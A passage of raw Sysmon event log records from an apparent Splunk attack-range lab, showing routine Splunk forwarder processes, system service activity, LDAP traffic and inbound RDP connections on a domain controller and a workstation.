Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.528{C8EA50B7-1591-6216-D006-000000003802}6388C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000295719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.903{C8EA50B7-1592-6216-D106-000000003802}64086112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.158{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1592-6216-D106-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.095{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.095{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.095{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.095{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.095{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1592-6216-D106-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.080{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1592-6216-D106-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.084{C8EA50B7-1592-6216-D106-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:02.011{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45F1FA9EB9D0C01029B9547DF685A5E8,SHA256=AAD294A84A189FFF456C3021EB422FCCFA30E80EEEC9CFA4F553A8C2A34EE667,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:02.254{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E634EEB94D764E0073CA632EEAAFC08D,SHA256=52B24B751F47B4122E06AF3BA1A440B0BA8B883F5ECFCFBF5116D8BE15B9284D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:02.207{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE7CD022D48655C222FE3B99454A78B9,SHA256=7CFDD4CF2545F870DEAE8D5833103B32D414971671C49B6862A084CB7BB02D5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:59.703{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51544-false10.0.1.12-8000- 354300x8000000000000000219880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:58.972{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53220-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:03.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A072443FBB5B0C2BD19A83A3524AE43,SHA256=3FBC7357ADB69E2EBC40965C3CDE757A7926C99A493913633F2C5B177CF49F07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.965{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1593-6216-D206-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.965{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.965{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.965{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.965{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.965{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1593-6216-D206-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.965{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1593-6216-D206-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.968{C8EA50B7-1593-6216-D206-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000295722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.634{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49269-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.650{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AC2C56498F2FC0D254C600474C2197B3,SHA256=884418618B565DBA9156BA4FF8C3E0B1715154E4FBFC95D635524DC0FAE6C42E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.035{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5F9C239DFE7185004938ED8C9BFBDD0,SHA256=C595EBFD80671009602F274F63B5EEC5DEE4E430EE1420CCCAA29A5573BF01BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:04.395{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=300E44C59FCEF5FCFF5BA7F789816145,SHA256=DE6DDE6332E40D1EF3FC4483E4D20A231E4F09334D4A45EEE4FAEF59262C9A8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:04.103{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5B16E30684F6F5EDF4D8E461D242EA1,SHA256=D4E283A8340595FFC310D9D39F29A6F062782D8A1CC3AC61676049C0B4B72DEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:05.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=721BA3F605CDF955A3550B3AF72E51B2,SHA256=B0744EAFC11AF1A83C01C1A1F05FD16F69DA202AC6FCEB75CAE388B95B0A2E51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:05.410{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E56B49BBA57A747980BCBBF8C20A65,SHA256=54ADEE2D2707FCCE3E7F251974DA83F9F10E273FEC8AED96BDB2BEA52A67B1A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.371{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49271-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:03.370{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49271-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000295732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:05.138{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DA2A993746F972BCE54EBB71F876B1E,SHA256=A992D7889A7C670505ED4F78D8C33A5546679DB7063C46828C5E1156B325FD91,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:03.058{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53535-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:06.410{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 